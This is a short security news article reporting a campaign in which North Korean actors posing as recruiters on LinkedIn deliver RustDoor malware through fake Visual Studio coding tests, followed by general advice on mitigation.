North Korean hackers spread RustDoor Malware on LinkedIn

Home/malicious cyber actors, Malware, Security Advisory, Security Update/North Korean hackers spread RustDoor Malware on LinkedIn

North Korean hackers spread RustDoor Malware on LinkedIn

North Korean hackers are targeting LinkedIn users with advanced malware called RustDoor. This highlights the growing use of social engineering by state-sponsored groups, particularly from North Korea, on professional networking sites.

North Korean hackers are exploiting LinkedIn by posing as recruiters and HR professionals to target users.

Jamf Threat Labs reports that attackers create fake profiles mimicking real tech companies to offer job opportunities, bypassing initial skepticism.

Attackers target individuals in cryptocurrency and tech sectors by reviewing their social media activity. They initiate conversations, eventually leading to the delivery of malicious software, exploiting trust in professional networking.

RustDoor Malware

The attacks use RustDoor malware, often disguised as coding challenges or pre-employment tests. Victims receive seemingly legitimate projects, like Visual Studio tasks, which contain hidden malicious scripts that activate when the project is built.

These scripts download extra payloads from remote servers, embedding themselves deeply in the victim’s system. RustDoor malware functions as both an infostealer and backdoor, capable of downloading and uploading files, executing commands, and prompting users for passwords while posing as legitimate apps like Visual Studio.

Comparison of configuration

The scripts download extra payloads, deeply embedding themselves in the victim’s system. RustDoor malware acts as an infostealer and backdoor, enabling file transfers, command execution, and password prompts while disguising itself as legitimate applications like Visual Studio.

Mitigation and Response

  • Increased Attack Sophistication: Highlights the need for strong cybersecurity and awareness training.
  • Educate Employees: Warn staff about risks from unsolicited contacts on LinkedIn and other social media.
  • Verify Offers: Check the legitimacy of job offers and software requests before acting.
  • Strengthen Defenses: Regularly update security software and systems. Use tools to detect unusual network activity.
  • Focus on Cryptocurrency Sector: Companies in this sector should be extra cautious due to higher risks.
  • State-Sponsored Threats: North Korean actors use sophisticated social engineering techniques.
  • Stay Vigilant: Be proactive in cybersecurity practices to effectively manage and mitigate threats.

Post Views: 143
By | 2024-09-18T08:02:30+05:30 September 17th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update|

About the Author:

FirstHackersNews- Identifies Security

Related Posts

Leave A Comment

Subscribe to our newsletter to receive security tips everday!